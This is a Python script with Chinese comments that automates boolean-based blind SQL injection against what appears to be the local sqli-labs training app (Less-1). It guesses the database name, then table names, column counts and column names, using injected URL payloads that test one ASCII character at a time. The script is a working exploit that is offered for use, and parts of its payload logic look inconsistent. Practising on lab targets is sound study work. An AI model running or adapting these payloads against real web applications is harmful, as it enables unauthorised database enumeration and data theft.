import requests

if __name__ == "__main__":
    db_length = 1
    db_url = ''
    db_name = ''
    db_ascii = 1
    db_place = 1
    tb_sum = 1
    tb_url = ''
    tb_num1 = 0
    tb_lname = 0
    tb_array = []
    tb_nameasc = 0
    tb_namenum = 0
    tb_namepla = 0
    tb_nameurl = ''
    tb_name = ''
    tb_arrayname = []
    # 猜解数据库名长度
    print('开始猜解数据库名长度')
    url = "http://127.0.0.1:8888/Less-1/?id=1'+"
    for db_length in range(1, 100):
        db_url = f"{url}and {db_length}=(select length(database()))--+"
        r = requests.get(db_url)
        if 'Your Login name' in r.text:
            print('[!] ' + db_url)
            print('猜解结束')
            break
        else:
            print('[x] ' + db_url)
    print('数据库名长度：%d' % (db_length))
    pass
    # 猜解数据库名
    # 猜解数据库名ascii(substr(database(),x,1)
    print('----------------------------------------------')
    print('\n\n正在猜解数据库名.......')
    db_urlname = 'and %d=ascii(substr(database(),%d,1))--+' % (db_ascii, db_place)
    for db_place in range(1, db_length + 1):
        for db_ascii in range(0, 127):
            db_urlname = url + 'and %d=ascii(substr(database(),%d,1))--+' % (db_ascii, db_place)
            print(db_urlname)
            r = requests.get(db_urlname)
            if 'Your Login name' in r.text:
                db_name = db_name + chr(db_ascii)
                print('[!] ' + db_name)
                break
            else:
                continue
    print('end.......')
    print('数据库名：' + db_name)
    # 猜解表数 select count(table_name)  from information_schema.tables where table_schema='security';
    print('\n\n开始猜解表数.......')
    for tb_sum in range(1, 10):
        tb_url = url + '+and %d=(select count(table_name)  from information_schema.tables where table_schema=database())--+' % (
            tb_sum)
        r = requests.get(tb_url)
        if 'Your Login name' in r.text:
            print('[!] ' + tb_url)
            break
        else:
            print('[x] ' + tb_url)
    print('猜解表数结束')
    print('表数：%d' % (tb_sum))
    # 猜解表名长度select length((select table_name from information_schema.tables where table_schema=database() limit 0,1 ));
    # +-----------------------------------------------------------------------------------------------------+
    # | length((select table_name from information_schema.tables where table_schema=database() limit 0,1 )) |
    # +-----------------------------------------------------------------------------------------------------+
    # |                                                                                                   6 |
    # +-----------------------------------------------------------------------------------------------------+
    # 1 row in set (0.00 sec)

    # mysql> show tables;
    # +--------------------+
    # | Tables_in_security |
    # +--------------------+
    # | emails             |
    # | referers           |
    # | uagents            |
    # | users              |
    # +--------------------+
    # 4 rows in set (0.00 sec)
    print('\n\n开始猜解每一个表名长度')
    for tb_num1 in range(0, tb_sum + 1):
        for tb_lname in range(1, 20):
            tb_lengthurl = url + '+and %d=length((select table_name from information_schema.tables where table_schema=database() limit %d,1 ))--+' % (
                tb_lname, tb_num1)
            r = requests.get(tb_lengthurl)
            if 'Your Login name' in r.text:
                tb_array.append(tb_lname)
                print('[!] %d' % (tb_lname) + '>>%s' % (tb_lengthurl))
                tb_lname = 0
                break
            else:
                continue
    for i in range(0, len(tb_array)):
        print('猜解结束第%d个表名长度分别为：%d' % (i + 1, tb_array[i]))
    print('猜解各个表名长度结束')
    print('\n\n')
    # 猜解表名 select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1  ),1,1);
    print('猜解各个表名开始...........')
    for tb_namenum in range(0, tb_sum):
        for tb_namepla in range(1, tb_array[tb_namenum] + 1):
            for tb_nameasc in range(0, 128):
                tb_nameurl = url + 'and %d=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1  ),%d,1))--+' % (
                    tb_nameasc, tb_namenum, tb_namepla)
                r = requests.get(tb_nameurl)
                if 'Your Login name' in r.text:
                    tb_name = tb_name + chr(tb_nameasc)
                    print('[!] ' + tb_name)
                    break
                else:
                    continue
        tb_arrayname.append(tb_name)
        tb_name = ''
        print('\n')
    for i in range(0, len(tb_arrayname)):
        print('猜解结束第%d个表名为：%s' % (i + 1, tb_arrayname[i]))
    # 猜解列个数
    cl_osum = []
    print('\n\n开始猜解列个数...........')
    for i in range(tb_sum):
        for j in range(1, 10):
            cl_sumurl = url + 'and %d=(select count(column_name) from information_schema.columns where table_name = "%s")--+' % (
                j, tb_arrayname[i])
            r = requests.get(cl_sumurl)
            if 'Your Login name' in r.text:
                cl_osum.append(j)
                print('[!] ' + cl_sumurl + '>>匹配成功')
                break
            else:
                continue
    for i in range(0, tb_sum):
        print(tb_arrayname[i] + '列数：%d' % (cl_osum[i]))
    print('猜解列个数结束')
    # 猜解每个表的列数
    ##mysql> select count(column_name) from information_schema.columns where table_name = 'users' limit 0,1;
    # +--------------------+
    # | count(column_name) |
    # +--------------------+
    # |                  3 |
    # +--------------------+
    # 1 row in set (0.01 sec)

    # for i in range(4):
    #     for j in range(1,10):
    #         cl_sumurl = url+'and %d=(select count(column_name) from information_schema.columns where table_name = "%s")--+'%(j,tb_arrayname[i])
    #         r=requests.get(cl_sumurl)
    #         if 'You are in...........' in r.text:
    #             print(tb_arrayname[i]+'的列数为：%d'%(j))
    #             break
    #         else:
    #             continue
    cl_lensum = []
    cl_lennam = []
    # 计算admin列长度即可
    for j in range(0, 4):
        for l in range(1, 20):
            cl_len = url + 'and %d=length((select column_name from information_schema.columns where table_name="users" limit %d,1 ))--+' % (
                l, j)
            r = requests.get(cl_len)
            if 'Your Login name' in r.text:
                cl_lennam.append(l)
                print('users>>第%d列长度为：%d' % (j + 1, l))
                break
            else:
                continue
    print('\n')
    print(cl_lennam)
    # 猜解列名
    # select ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1));
    # +-------------------------------------------------------------------------------------------------------------+
    # | ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) |
    # +-------------------------------------------------------------------------------------------------------------+
    # |                                                                                                         105 |
    # +-------------------------------------------------------------------------------------------------------------+
    # 1 row in set (0.01 sec)
    # 想知道users表的3列的各个列名
    cl_name = ''
    cl_namearr = []
    for j in range(0, 3):
        for i in range(cl_lennam[j] + 1):
            for cl_ascii in range(0, 128):
                cl_admin = url + 'and %d=ascii(substr((select column_name from information_schema.columns where table_name="users" limit %d,1),%d,1))--+' % (
                    cl_ascii, j, i)
                r = requests.get(cl_admin)
                if 'Your Login name' in r.text:
                    cl_name = cl_name + chr(cl_ascii)
                    print('[~]' + cl_name)
                    break
                else:
                    continue
        cl_name = cl_name.strip('\x00')
        cl_namearr.append(cl_name)
        cl_name = ''
        print('\n')
    print(cl_namearr)
